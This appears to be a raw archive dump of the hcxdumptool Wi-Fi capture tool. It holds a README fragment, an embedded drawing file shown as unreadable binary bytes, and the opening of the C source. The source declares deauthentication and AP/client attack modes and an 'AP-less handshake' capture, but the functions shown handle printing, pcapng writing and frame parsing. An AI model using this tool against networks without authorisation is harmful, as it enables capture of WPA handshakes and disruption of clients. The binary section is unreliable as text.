* GPIO hardware mod recommended Supported adapters (strict) * USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter * USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter * USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter 25.02.2018 ========== - initial start of this repository - added hcxdumptool - added hcxpioff hcxdumptool-5.1.7/docs/000077500000000000000000000000001350370021700150205ustar00rootroot00000000000000hcxdumptool-5.1.7/docs/gpiowait.odg000066400000000000000000000331721350370021700173440ustar00rootroot00000000000000PKE=|N.++mimetypeapplication/vnd.oasis.opendocument.graphicsPKE=|Nmeta.xmlSM0W WcCR=mJM"b{ނlBJQqoͼ60VjU8Ba \c}YX}(drV(Z`*KPFQ][i[acTwB-FIh~95R*: 0 @"myzL(ΠhWG.X^SahܗcYZ_L{܀zPm[ܫ豀5UOk%{x;Gysk(gǮ׮oR ë5/e8b 3bFAQoƀ$%if(8 58ۡ&1("lI.YUp7S.|!ƻ5fU >7\+id?M\4UozPK)PKE=|N settings.xmlZr8}߯HffnB 5$a7a5,$9ߖ Y؄h%[:jw})4T+PR&~-\ɄP2L"pеz(QD3]$]3aM Gǧk|>?J5-WXF(bY (/F ˅9Ï*:b|W.;(F_]aW^ZW"GA9àqrWl.[R_'HoL[4fM&L(W.ʯqޅ݇IW ɨU/ l:KZ9'\0O-7N-v=a6 C!hhO?AcB"]%ŦCA⑴,d DMY,F%I>I܎t^2Ỳ'A7,<Ư]tޞpY10| iS3kk.[ڏ>Y`'~;ij4z>>C|emP7i0a}8F%M,w fȏosW,m&z8 Ԃ](\K=ݑ :Y0'sIYf,B3"p'~4C(;9O߃FDlKU)yVʧa[!j%o|+|LO+`衖|V0Q՛jvml&U9ma>:DϼDspf M4܄h Pth󵥱?VI܁1g vhW1s_[ǣMr[=D4o2˜(|6e uB LanKA/Z@e-M1<˫.kdXնZR>bHٱα=Dai~Z6]ea-7>8O#~1{K7y͒%U_щ{ӹ9b.2 EDR(9)SE0"_E lHae_<`퓅L2G%IxȺicNubU}U,"y!M(c]-a-( *6Wo-^ Y0ZHKCUFr)j"[eQ%ɣlϵR/,QRVlvN客j.3%s.23Z j}M2?&4xCg۪ʗyo#oFᰡwE©V%V6`~RKob64AQII,05fvtm$0۠g*h5?TЪ˛V_ϼr󮍫"+ 8mBU\]hY);yx< ASQ:`R =c!t"D)an˕ݼ{n4hzUȔimųCюNA86('E8h=R`ѶJy c{MZMRuIM&]N&OX8Qw,8,4鄆j;pfl]]~FyTĬ*H8۲B[ &Bod&!DOKȴÒ|yE09Ij=lq²DT<|WlȧZ-3ՁFl t~0WQok}xë2% ']j 'tpf&(4$ EW! 
"gW6#}E*r` Uif1Grƴ3T,*JO&6A2VSҿ l#MũMY˃]E 꼝ckOUa\σM1n 8 7`b*(V}5U*ȇ /,Иn4[&thH,wQQ%E=aQxC?wewLTؒ1.1MAmo4mkL) `aڔ+6hQC §["Pc++hH8I@Vnr`   q>W j?>ey !gVq%q;'z BLv4]p>eqK3p/8yj293.@h>@?MS( *|YagJ_p(zAOnT?0btG(|MF˰&#w.ù ,It%u$4QiG[[QOfRҚfZ刘ܒqEiLoIjWFlES7 {jq9dʜ=֤ 2^]-SNp3tڟMk3a[h5/;^gq4r^rgm^3s?oI9 Kv[ϳچa$溠r#qhH@.wL-EmޒWA2Ϡ١;GՊ!$I@rS*KNA*$ (u:띖$Id(Dөhȣj0Bd$:eTI:R4U-,!)(u:%A(ϼ:@$$L}BuhУj0#)[N#USHTMUjO$Ȗ{Z% I"SG]t:4;Z-lI:KUY$)Fh锄<I$2 }eNACHRlUӑja% ITEs(ʁG ij\jO SEA&iuW~Z.JB#^KЗxぁ!o3r &mև`owd11=3~HȽ #}P % n-6+"AH$U־S-4f24h@k<+ Fv_ !!6\ʭv*)1ObrF< <"r7wG` {ÿgyR'5 ٬Y9 Yl{d$Y"Ga-ഓTJsT|C&S CkƊI@tv}+g$3T43#=q{αp &o>]1ߥy  TC,???EG$U֙zJ!U`w݆]W$Z<&FrSP.@C߮t=Z$Z]u>>EEELLLSSS\\\dddkkksss{{{׫ٲ˻¶ͿĶ޷޽ѽL {IDATx #jy &}B?\CٖV֭{w`faM{7c` 10c` 10c` 10c` 10c` 10c` 10c` 10c` 10(&=R?t7/!#HJ2RrIS! f.[.L0sSˑF[TA(]fIk'4(t ZMQhz% l-l ilJ6sc-8mU[cRɵd:UU5*RM\(4ݥ1rJA"xQ2 '`A 9GS3iW_>[*{7x0 oʶN;\` @3:NQ*Ū*dXC+H5nCR{ImTS+-󡮿Q6n6#?9S Ż ݢܰ{Buz-#Z\c+$ e -sFHR ֪.Jy,Ή0ޢ{jׁEAE c,1;P1`ɔƨP?.ǧ^/vI#ޞS?~WLDvx0`S$bR _6}@"5&LBWd7,з_ߋɠ3ڃRӆG, H4s!#X`Tűax0˧/Oqߞ~Y?OOK~<7ϟ>i i?t#BƲ>$X4p[jx`i;FuKxK% 404 HcF`*%Z}#$s^A?2mޓh|z-MUgnJ;P4ӤMBeץKchOO'oy { 7;٨E=_&n튷rD.U>lCOzevT˭HÊfDo@N;7Gn*8d_̬]U;AQsZmcDKJ3iy YS:+ sRC_d.7mhx'c}aO4>{~,FO<!&|!14Kg,x0/6,c!w~vlN+M1(N*C?pO>t4$N~㰰dU~~[bjͱ渕"~wܮo#UbT1`8'~]Sy<QTSm«wR u0~{k'4-}[7M1@mTr d6{'l]; ^}E\;[/&0{/7㔱|b; tܗzq͗K$!b/B@\'x%ef 34=+m O˾u:ۙdn$q7IbZ{rƮu.ۂ*(wSq !RErQL}o)bq/{ p\#N6]q&_˽AYjk1!gRU™OaN(Y]>KTm=djźIʗ3y!f ac2"! |S/7fz+[2K> ۢ5-LRMA\EZa62 $_[Q(&K};"z Vb%07*Z#Y,f/}w0R+V87?SQkhaƥOd-;@ }i|ȕs,#aY*c9 !õ`p5ނl pDzjSkcgm!x a$?%~Wk7!Q !u? 
~df%4#5!>"db\0htp'A&9|79~_z9`:,U4_]BOfr~B!^`rtgӫ`zBKmp9j_:(:)anx\4}\&]>=h˜J\ߌg\-c+<2ڣdpH[*l .I0 FQ0nCކP4Qt%֙j; 3OQ4=DOUb]ek N,) "/%}%- VrL=E,%fb1aI.+&%PN R@ AI҄}lwFM|$V_n2Qю;6daxb%ƐQM`>*'z7_6'lPaZח\tpQ'O%o2m39}!zrCpE(@x}MNP!4=!Bׯ.˓!4y\WO zq: N+Pd}cmޜvB`uWX ڭn/(Y&Ro!6P1yxo (POɠTdb ɥrz:#fNK>B>+ӽVx3kuAܓj*cbR պ?{:PgΦʃtuFTGKGjjj v~R [Zŭ9,k]h -Stϋ(: ucM@0_^d+G e*u]&_+$%t^|_;I3(N2)va.5bێZWݰ/r\Dw̾x8V78>%>.ۣ,y]KȒ,#.萜f f]=zfIg?KfWfGh 6ǩ,#@t Nle'jWMj"<Mp;T yR\gYkU.I+8fbP:J1يEԷKT +䀊vAKU&ȡ< |"/!581݋.4/fRѓW,47{&;8K.Nf-|-o5CU)Om&) >`U9lpF;FEBˁ.<=B7D;yXD7%}u9<Э.藍qW:GiOW*Rq;xzLϲM4 (܀V9. /fs*.沆]" 6U #C&^z1Ը{F5?ɤեp*ӄ (4ˇwXPI7PR׿Go£5vJ qdaWV`~ji 5~fL''PK3l RPKE=|NMETA-INF/manifest.xmlSKj0F{KmVEɢP3 >}m'.%Cv3}ݡw:CLaU@ڷH]þ_;7; ,Q +W $ ɬ@ew_NLn!`ˮC?N@jUD8 ~S-Pr`uP0PТ%@T$H : 'ԉ5:d#xMU rM/֞ո v%NN[d (zx*$\@Tb$_, #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __ANDROID__ #include #define strdupa strdup #include "include/android-ifaddrs/ifaddrs.h" #include "include/android-ifaddrs/ifaddrs.c" #else #include #endif #include #include #include #include #include #include #include #include #include #include "include/version.h" #include "include/hcxdumptool.h" #include "include/rpigpio.h" #include "include/wireless-lite.h" #include "include/byteops.c" #include "include/ieee80211.c" #include "include/pcap.c" #include "include/strings.c" #include "include/hashops.c" /*===========================================================================*/ /* global var */ static int fd_socket; static int fd_socket_gpsd; static int fd_pcapng; static int fd_ippcapng; static int fd_weppcapng; static int fd_rcascanpcapng; static maclist_t *filterlist; static int filterlist_len; static struct ifreq ifr_old; static struct iwreq iwr_old; static aplist_t *aplist, *aplist_ptr; static int aplistcount; static myaplist_t *myaplist, *myaplist_ptr; static macmaclist_t *pownedlist; static enhanced_packet_block_t 
*epbhdr; static uint8_t *packet_ptr; static int packet_len; static uint8_t *ieee82011_ptr; static int ieee82011_len; static mac_t *macfrx; static uint8_t *payload_ptr; static int payload_len; static uint8_t *llc_ptr; static llc_t *llc; static uint8_t *mpdu_ptr; static mpdu_t *mpdu; static uint8_t statusout; static int gpsd_len; static int errorcount; static int maxerrorcount; static unsigned long long int incommingcount; static unsigned long long int outgoingcount; static unsigned long long int droppedcount; static unsigned long long int pownedcount; static int day; static int month; static int year; static int hour; static int minute; static int second; static long double lat; static long double lon; static long double alt; static bool wantstopflag; static bool ignorewarningflag; static bool poweroffflag; static bool staytimeflag; static bool gpsdflag; static bool activescanflag; static bool rcascanflag; static bool deauthenticationflag; static bool disassociationflag; static bool attackapflag; static bool attackclientflag; static int filtermode; static int eapoltimeout; static int deauthenticationintervall; static int deauthenticationsmax; static int apattacksintervall; static int apattacksmax; static int staytime; static int stachipset; static uint8_t cpa; static int gpiostatusled; static int gpiobutton; static uint32_t myouiap; static uint32_t mynicap; static uint32_t myouista; static uint32_t mynicsta; static uint64_t timestamp; static uint64_t timestampstart; struct timeval tv; static uint64_t mytime; static int mydisassociationsequence; static int myidrequestsequence; static int mydeauthenticationsequence; static int mybeaconsequence; static int myproberequestsequence; static int myauthenticationrequestsequence; static int myauthenticationresponsesequence; static int myassociationrequestsequence; static int myassociationresponsesequence; static int myproberesponsesequence; static char *interfacename; static char *pcapngoutname; static char *ippcapngoutname; 
static char *weppcapngoutname ; static char *filterlistname; static char *rcascanlistname; static char *rcascanpcapngname; static const uint8_t hdradiotap[] = { 0x00, 0x00, // radiotap version + pad byte 0x0e, 0x00, // radiotap header length 0x06, 0x8c, 0x00, 0x00, // bitmap 0x00, // flags 0x02, // rate 0x14, // tx power 0x01, // antenna 0x08, 0x00 // tx flags #define HDRRT_SIZE sizeof(hdradiotap) }; static uint8_t channeldefaultlist[] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 32, 34, 36, 38, 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, 60, 62, 64, 68, 96, 100, 102, 104, 106, 108, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128, 132, 134, 136, 138, 140, 142, 144, 149, 151, 153, 155, 157, 159, 161, 161, 165, 169, 173, 0 }; static uint8_t channelscanlist[128] = { 1, 6, 2, 11, 1, 13, 6, 11, 1, 6, 3, 11, 1, 12, 6, 11, 1, 6, 4, 11, 1, 10, 6, 11, 1, 6, 11, 5, 1, 6, 11, 8, 1, 9, 6, 11, 1, 6, 11, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; static uint8_t mac_orig[6]; static uint8_t mac_mysta[6]; static uint8_t mac_myap[6]; static uint8_t mac_mybcap[6]; static unsigned long long int rcrandom; static uint8_t anoncerandom[32]; static uint64_t lasttimestampm1; static uint8_t laststam1[6]; static uint8_t lastapm1[6]; static uint64_t lastrcm1; static uint64_t lasttimestampm2; static uint8_t laststam2[6]; static uint8_t lastapm2[6]; static uint64_t lastrcm2; static uint8_t epb[PCAPNG_MAXSNAPLEN *2]; static char gpsddata[GPSDDATA_MAX +1]; /*===========================================================================*/ #ifdef DEBUG static inline void debugprint(int len, uint8_t *ptr) { static int p; fprintf(stdout, "\nRAW: "); for(p = 0; p < len; p++) { fprintf(stdout, "%02x", ptr[p]); } fprintf(stdout, "\n"); return; } #endif 
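/*===========================================================================*/
/*
 * Run a "pidof <name>" command and warn on stderr if it prints a pid.
 *
 * unwantedname: the full shell command, e.g. "pidof NetworkManager".
 *               &unwantedname[6] skips the 6-character "pidof " prefix so
 *               only the process name appears in the warning.
 *
 * The command string is passed to popen() as-is; the only callers in this
 * file (checkallunwanted) pass string constants, never user input.
 */
static inline void checkunwanted(char *unwantedname)
{
static FILE *fp;
static char pidline[1024];
static char *pidptr = NULL;

memset(&pidline, 0, 1024);
fp = popen(unwantedname,"r");
if(fp)
	{
	/* fgets() leaves the trailing newline of pidof's output in pidline */
	pidptr = fgets(pidline, 1024, fp);
	if(pidptr != NULL)
		{
		fprintf(stderr, "warning: %s is running with pid %s", &unwantedname[6], pidline);
		}
	pclose(fp);
	}
return;
}
/*===========================================================================*/
/*
 * Return true if the interface name contains the substring "mon".
 *
 * checkinterfacename: interface name, may be NULL.
 *
 * NOTE: a NULL name is reported as a monitor interface (returns true);
 * callers outside this chunk decide how to treat that.
 */
static inline bool checkmonitorinterface(char *checkinterfacename)
{
static char *monstr = "mon";

if(checkinterfacename == NULL)
	{
	return true;
	}
if(strstr(checkinterfacename, monstr) == NULL)
	{
	return false;
	}
return true;
}
/*===========================================================================*/
/*
 * Warn about the two daemons that are known to compete for the interface
 * (NetworkManager and wpa_supplicant).
 */
static inline void checkallunwanted()
{
static char *networkmanager = "pidof NetworkManager";
static char *wpasupplicant = "pidof wpa_supplicant";

checkunwanted(networkmanager);
checkunwanted(wpasupplicant);
return;
}
/*===========================================================================*/
/*
 * Write the collected AP list (sorted by ESSID) to rcascanlistname.
 *
 * Each line: <mac hex> <essid or $HEX[...]> [CHANNEL n[, AP IN RANGE]]
 * ESSIDs that are not printable ASCII are written as $HEX[..].
 * Iteration stops at the first entry with timestamp == 0 (unused slot)
 * or after APLIST_MAX entries.
 *
 * Fixed: the loop condition was `APLIST_MAX` (always true), so a full
 * list had no upper bound; and the "$HEX[" / "]" delimiters of a non-ASCII
 * ESSID went to stdout instead of the output file.
 */
static inline void saveapinfo()
{
static int c, p;
static aplist_t *zeiger;
static FILE *fhrsl;

if((fhrsl = fopen(rcascanlistname, "w+")) == NULL)
	{
	fprintf(stderr, "error opening file %s", rcascanlistname);
	return;
	}
qsort(aplist, aplist_ptr -aplist, APLIST_SIZE, sort_aplist_by_essid);
zeiger = aplist;
for(c = 0; c < APLIST_MAX; c++)
	{
	if(zeiger->timestamp == 0)
		{
		break;
		}
	for(p = 0; p< 6; p++)
		{
		fprintf(fhrsl, "%02x", zeiger->addr[p]);
		}
	if(isasciistring(zeiger->essid_len, zeiger->essid) != false)
		{
		fprintf(fhrsl, " %.*s", zeiger->essid_len, zeiger->essid);
		}
	else
		{
		fprintf(fhrsl, " $HEX[");
		for(p = 0; p < zeiger->essid_len; p++)
			{
			fprintf(fhrsl, "%02x", zeiger->essid[p]);
			}
		fprintf(fhrsl, "]");
		}
	if(zeiger->status == 1)
		{
		fprintf(fhrsl, " [CHANNEL %d, AP IN RANGE]\n", zeiger->channel);
		}
	else
		{
		fprintf(fhrsl, " [CHANNEL %d]\n", zeiger->channel);
		}
	zeiger++;
	}
fclose(fhrsl);
return;
}
/*===========================================================================*/
/*
 * Shut everything down and exit: blink the status LED, restore the
 * interface flags and wireless mode saved at startup (ifr_old / iwr_old),
 * close the raw socket, tell gpsd to stop watching, finish and close every
 * pcapng output (writes the interface statistics block first), free the
 * lists, optionally write the AP list and power off.
 *
 * Exit status is EXIT_FAILURE if any transmit/write error was counted
 * during the run (errorcount != 0), EXIT_SUCCESS otherwise.
 */
__attribute__ ((noreturn)) static void globalclose()
{
static struct ifreq ifr;
/* 23 bytes: the exact length of the literal below */
static char *gpsd_disable = "?WATCH={\"enable\":false}";

sync();
if(gpiostatusled > 0)
	{
	/* two LED pulses as a visible "shutting down" signal */
	GPIO_CLR = 1 << gpiostatusled;
	usleep(GPIO_DELAY);
	GPIO_SET = 1 << gpiostatusled;
	usleep(GPIO_DELAY);
	GPIO_CLR = 1 << gpiostatusled;
	usleep(GPIO_DELAY);
	GPIO_SET = 1 << gpiostatusled;
	usleep(GPIO_DELAY);
	}
if(fd_socket > 0)
	{
	/* take the interface down (zeroed flags), restore the old wireless
	 * mode unless the user asked to ignore warnings, then restore the
	 * original flags; ioctl failures are deliberately not reported here */
	memset(&ifr, 0, sizeof(ifr));
	strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1);
	ioctl(fd_socket, SIOCSIFFLAGS, &ifr);
	if(ignorewarningflag == false)
		{
		ioctl(fd_socket, SIOCSIWMODE, &iwr_old);
		}
	ioctl(fd_socket, SIOCSIFFLAGS, &ifr_old);
	if(close(fd_socket) != 0)
		{
		perror("failed to close raw socket");
		}
	}
if(gpsdflag == true)
	{
	if(write(fd_socket_gpsd, gpsd_disable, 23) != 23)
		{
		perror("failed to terminate GPSD WATCH");
		}
	}
if(fd_socket_gpsd > 0)
	{
	if(close(fd_socket_gpsd) != 0)
		{
		perror("failed to close gpsd socket");
		}
	}
if(fd_weppcapng > 0)
	{
	writeisb(fd_weppcapng, 0, timestampstart, incommingcount);
	if(fsync(fd_weppcapng) != 0)
		{
		perror("failed to sync wep pcapng file");
		}
	if(close(fd_weppcapng) != 0)
		{
		perror("failed to close wep pcapng file");
		}
	}
if(fd_ippcapng > 0)
	{
	writeisb(fd_ippcapng, 0, timestampstart, incommingcount);
	if(fsync(fd_ippcapng) != 0)
		{
		perror("failed to sync ip pcapng file");
		}
	if(close(fd_ippcapng) != 0)
		{
		perror("failed to close ip pcapng file");
		}
	}
if(fd_pcapng > 0)
	{
	writeisb(fd_pcapng, 0, timestampstart, incommingcount);
	if(fsync(fd_pcapng) != 0)
		{
		perror("failed to sync pcapng file");
		}
	if(close(fd_pcapng) != 0)
		{
		perror("failed to close pcapng file");
		}
	}
if(filterlist != NULL)
	{
	free(filterlist);
	}
if(aplist != NULL)
	{
	free(aplist);
	}
if(myaplist != NULL)
	{
	free(myaplist);
	}
if(pownedlist != NULL)
	{
	free(pownedlist);
	}
if(rcascanflag == true)
	{
	if(fd_rcascanpcapng > 0)
		{
		writeisb(fd_rcascanpcapng, 0, timestampstart, incommingcount);
		if(fsync(fd_rcascanpcapng) != 0)
			{
			perror("failed to sync pcapng file");
			}
		if(close(fd_rcascanpcapng) != 0)
			{
			perror("failed to close pcapng file");
			}
		}
	if(rcascanlistname != NULL)
		{
		saveapinfo();
		}
	}
/* "\e[?25h" re-enables the terminal cursor hidden during status output */
printf("\nterminated...\e[?25h\n");
if(poweroffflag == true)
	{
	if(system("poweroff") != 0)
		{
		printf("can't power off\n");
		}
	}
if(errorcount != 0)
	{
	exit(EXIT_FAILURE);
	}
exit(EXIT_SUCCESS);
}
/*===========================================================================*/
/*
 * Clear the terminal and print the AP list (sorted by ESSID) followed by a
 * one-line counter summary.
 *
 * Entry timestamps are in microseconds (divided by 1000000 to get seconds
 * for strftime). Entries with status == 1 are counted as "in range".
 * Iteration stops at the first unused slot (timestamp == 0) or after
 * aplistcount entries.
 */
static inline void printapinfo()
{
static int c, p;
static int rangecount;
static aplist_t *zeiger;
struct timeval tvfd;
static char timestring[16];

rangecount = 0;
zeiger = aplist;
qsort(aplist, aplistcount, APLIST_SIZE, sort_aplist_by_essid);
/* "\e[1;1H\e[2J": cursor home + clear screen */
printf("\e[1;1H\e[2J");
for(c = 0; c < aplistcount; c++)
	{
	if(zeiger->timestamp == 0)
		{
		break;
		}
	tvfd.tv_sec = zeiger->timestamp /1000000;
	tvfd.tv_usec = 0;
	strftime(timestring, 16, "%H:%M:%S", localtime(&tvfd.tv_sec));
	fprintf(stdout, "[%s] ", timestring);
	for(p = 0; p< 6; p++)
		{
		fprintf(stdout, "%02x", zeiger->addr[p]);
		}
	if((zeiger->essid_len == 0) || (zeiger->essid[0] == 0))
		{
		fprintf(stdout, " ");
		}
	else
		{
		if(isasciistring(zeiger->essid_len, zeiger->essid) == true)
			{
			fprintf(stdout, " %.*s", zeiger->essid_len, zeiger->essid);
			}
		else
			{
			/* non-printable ESSID: hashcat-style $HEX[...] encoding */
			fprintf(stdout, " $HEX[");
			for(p = 0; p < zeiger->essid_len; p++)
				{
				fprintf(stdout, "%02x", zeiger->essid[p]);
				}
			fprintf(stdout, "]");
			}
		}
	if(zeiger->status == 1)
		{
		fprintf(stdout, " [CHANNEL %d, AP IN RANGE]\n", zeiger->channel);
		rangecount++;
		}
	else
		{
		fprintf(stdout, " [CHANNEL %d]\n", zeiger->channel);
		}
	zeiger++;
	}
fprintf(stdout, "INFO: cha=%d, rx=%llu, rx(dropped)=%llu, tx=%llu, err=%d, aps=%d (%d in range)\n"
	"-----------------------------------------------------------------------------------\n"
	, channelscanlist[cpa], incommingcount, droppedcount, outgoingcount, errorcount, aplistcount, rangecount);
return;
}
/*===========================================================================*/
/*
 * Print the status-line prefix "[HH:MM:SS - channel] from -> to" using the
 * global tv timestamp and the current scan channel channelscanlist[cpa].
 * "\33[2K\r" erases the current terminal line first.
 *
 * mac_to, mac_from: 6-byte MAC addresses.
 */
static inline void printtimenet(uint8_t *mac_to, uint8_t *mac_from)
{
static int p;
static char timestring[16];

strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec));
fprintf(stdout, "\33[2K\r[%s - %03d] ", timestring, channelscanlist[cpa]);
for(p = 0; p< 6; p++)
	{
	fprintf(stdout, "%02x", mac_from[p]);
	}
fprintf(stdout, " -> ");
for(p = 0; p< 6; p++)
	{
	fprintf(stdout, "%02x", mac_to[p]);
	}
return;
}
/*===========================================================================*/
/*
 * Print an ESSID after the status prefix: printable ASCII as text,
 * anything else as $HEX[...]; an empty ESSID prints a single space.
 *
 * essidlen: number of bytes in essid.
 */
static inline void printessid(int essidlen, uint8_t *essid)
{
static int p;

if(essidlen == 0)
	{
	fprintf(stdout, " ");
	return;
	}
if(isasciistring(essidlen, essid) != false)
	{
	fprintf(stdout, " %.*s", essidlen, essid);
	}
else
	{
	fprintf(stdout, " $HEX[");
	for(p = 0; p < essidlen; p++)
		{
		fprintf(stdout, "%02x", essid[p]);
		}
	fprintf(stdout, "]");
	}
return;
}
/*===========================================================================*/
/*
 * Print an identity string (same formatting as printessid).
 * Nothing is printed when the first byte is 0.
 *
 * idlen: number of bytes in id; id must point to at least one byte.
 */
static inline void printid(uint16_t idlen, uint8_t *id)
{
static int p;

if(id[0] == 0)
	{
	return;
	}
if(isasciistring(idlen, id) != false)
	{
	fprintf(stdout, " %.*s", idlen, id);
	}
else
	{
	fprintf(stdout, " $HEX[");
	for(p = 0; p < idlen; p++)
		{
		fprintf(stdout, "%02x", id[p]);
		}
	fprintf(stdout, "]");
	}
return;
}
/*===========================================================================*/
/*
 * Update the global position/time fields (year, month, day, hour, minute,
 * second, lat, lon, alt) from the last gpsd JSON record in gpsddata.
 *
 * Each field is looked up by its JSON key; a field that is absent keeps its
 * previous value. The "\"time\":" key is 7 characters, so +8 skips the
 * opening quote of the timestamp string; the other keys are 6 characters
 * and are followed directly by the number.
 *
 * gpsddata comes from the gpsd socket and is treated as untrusted text:
 * sscanf only ever writes the fixed-size numeric globals.
 */
static inline void parsegpsdposition()
{
static char *gpsdptr;
static char *gpsd_time = "\"time\":";
static char *gpsd_lat = "\"lat\":";
static char *gpsd_lon = "\"lon\":";
static char *gpsd_alt = "\"alt\":";

if((gpsdptr = strstr(gpsddata, gpsd_time)) != NULL)
	{
	sscanf(gpsdptr +8, "%d-%d-%dT%d:%d:%d;", &year, &month, &day, &hour, &minute, &second);
	}
if((gpsdptr = strstr(gpsddata, gpsd_lat)) != NULL)
	{
	sscanf(gpsdptr +6, "%Lf", &lat);
	}
if((gpsdptr = strstr(gpsddata, gpsd_lon)) != NULL)
	{
	sscanf(gpsdptr +6, "%Lf", &lon);
	}
if((gpsdptr = strstr(gpsddata, gpsd_alt)) != NULL)
	{
	sscanf(gpsdptr +6, "%Lf", &alt);
	}
return;
}
/*===========================================================================*/
/*
 * Write the current packet (epb buffer, packet_len bytes already placed
 * after the EPB header by the caller) as a pcapng Enhanced Packet Block
 * for an AP-less M2 capture.
 *
 * Options appended: a comment ("HANDSHAKE AP-LESS", or the gpsd position
 * line followed by that comment when gpsd is active), the ANONCE used for
 * this handshake (OPTIONCODE_ANONCE) and end-of-options.
 *
 * fd: output file descriptor. A short write increments errorcount.
 *
 * Fixed: the gpsd comment is now built with snprintf() bounded by the
 * buffer size; %Lf of gpsd-supplied values has no fixed maximum width.
 */
static void writeepbm2(int fd)
{
static int epblen;
static int written;
static uint16_t padding;
static total_length_t *totallenght;
static int gpsdlen;
static char aplesscomment[] = {"HANDSHAKE AP-LESS" };
#define APLESSCOMMENT_SIZE sizeof(aplesscomment)
static char gpsdatabuffer[GPSDDATA_MAX];

epbhdr = (enhanced_packet_block_t*)epb;
epblen = EPB_SIZE;
epbhdr->block_type = EPBBID;
epbhdr->interface_id = 0;
epbhdr->cap_len = packet_len;
epbhdr->org_len = packet_len;
epbhdr->timestamp_high = timestamp >> 32;
epbhdr->timestamp_low = (uint32_t)timestamp &0xffffffff;
/* pcapng blocks are padded to 32-bit boundaries */
padding = (4 -(epbhdr->cap_len %4)) %4;
epblen += packet_len;
memset(&epb[epblen], 0, padding);
epblen += padding;
if(gpsdflag == false)
	{
	epblen += addoption(epb +epblen, SHB_COMMENT, APLESSCOMMENT_SIZE, aplesscomment);
	}
else
	{
	parsegpsdposition();
	snprintf(gpsdatabuffer, sizeof(gpsdatabuffer), "lat:%Lf,lon:%Lf,alt:%Lf,date:%02d.%02d.%04d,time:%02d:%02d:%02d\n%s", lat, lon, alt,day, month, year, hour, minute, second, aplesscomment);
	gpsdlen = strlen(gpsdatabuffer);
	epblen += addoption(epb +epblen, SHB_COMMENT, gpsdlen, gpsdatabuffer);
	}
epblen += addoption(epb +epblen, OPTIONCODE_ANONCE, 32, (char*)anoncerandom);
epblen += addoption(epb +epblen, SHB_EOC, 0, NULL);
/* trailing block length must equal the one in the header */
totallenght = (total_length_t*)(epb +epblen);
epblen += TOTAL_SIZE;
epbhdr->total_length = epblen;
totallenght->total_length = epblen;
written = write(fd, &epb, epblen);
if(written != epblen)
	{
	errorcount++;
	}
return;
}
/*===========================================================================*/
/*
 * Write the current packet (epb buffer, packet_len bytes already placed
 * after the EPB header by the caller) as a pcapng Enhanced Packet Block.
 *
 * When gpsd is active a comment option with the position line is added;
 * end-of-options always follows.
 *
 * fd: output file descriptor. A short write increments errorcount.
 *
 * Fixed: the gpsd comment is now built with snprintf() bounded by the
 * buffer size (see writeepbm2).
 */
static void writeepb(int fd)
{
static int epblen;
static int written;
static uint16_t padding;
static total_length_t *totallenght;
static int gpsdlen;
static char gpsdatabuffer[GPSDDATA_MAX];

epbhdr = (enhanced_packet_block_t*)epb;
epblen = EPB_SIZE;
epbhdr->block_type = EPBBID;
epbhdr->interface_id = 0;
epbhdr->cap_len = packet_len;
epbhdr->org_len = packet_len;
epbhdr->timestamp_high = timestamp >> 32;
epbhdr->timestamp_low = (uint32_t)timestamp &0xffffffff;
/* pcapng blocks are padded to 32-bit boundaries */
padding = (4 -(epbhdr->cap_len %4)) %4;
epblen += packet_len;
memset(&epb[epblen], 0, padding);
epblen += padding;
if(gpsdflag == true)
	{
	parsegpsdposition();
	snprintf(gpsdatabuffer, sizeof(gpsdatabuffer), "lat:%Lf,lon:%Lf,alt:%Lf,date:%02d.%02d.%04d,time:%02d:%02d:%02d", lat, lon, alt,day, month, year, hour, minute, second);
	gpsdlen = strlen(gpsdatabuffer);
	epblen += addoption(epb +epblen, SHB_COMMENT, gpsdlen, gpsdatabuffer);
	}
epblen += addoption(epb +epblen, SHB_EOC, 0, NULL);
/* trailing block length must equal the one in the header */
totallenght = (total_length_t*)(epb +epblen);
epblen += TOTAL_SIZE;
epbhdr->total_length = epblen;
totallenght->total_length = epblen;
written = write(fd, &epb, epblen);
if(written != epblen)
	{
	errorcount++;
	}
return;
}
/*===========================================================================*/
/*
 * Walk the 802.11 information-element list starting at tagptr and return
 * a pointer to the first element with id == tag, or NULL.
 *
 * tagptr:  first byte of the IE list (received, untrusted data).
 * restlen: number of bytes available from tagptr.
 *
 * NULL is also returned when the matching element's declared length runs
 * past restlen, so callers may trust tagfield->len of a non-NULL result.
 *
 * Fixed: the loop now requires a full IE header (IETAG_SIZE bytes) before
 * dereferencing it; previously a single trailing byte was read as id/len,
 * one byte past the end of the frame.
 */
static inline uint8_t *gettag(uint8_t tag, uint8_t *tagptr, int restlen)
{
static ietag_t *tagfield;

while(restlen >= (int)IETAG_SIZE)
	{
	tagfield = (ietag_t*)tagptr;
	if(tagfield->id == tag)
		{
		if(restlen >= (int)tagfield->len +(int)IETAG_SIZE)
			{
			return tagptr;
			}
		return NULL;
		}
	/* len + header is always > 0, so the walk terminates */
	tagptr += tagfield->len +IETAG_SIZE;
	restlen -= tagfield->len +IETAG_SIZE;
	}
return NULL;
}
/*===========================================================================*/
/*
 * Return true if filtermac (6 bytes) is in the user-supplied filter list
 * (filterlist, filterlist_len entries).
 */
static inline bool checkfilterlistentry(uint8_t *filtermac)
{
static int c;
static maclist_t * zeiger;

zeiger = filterlist;
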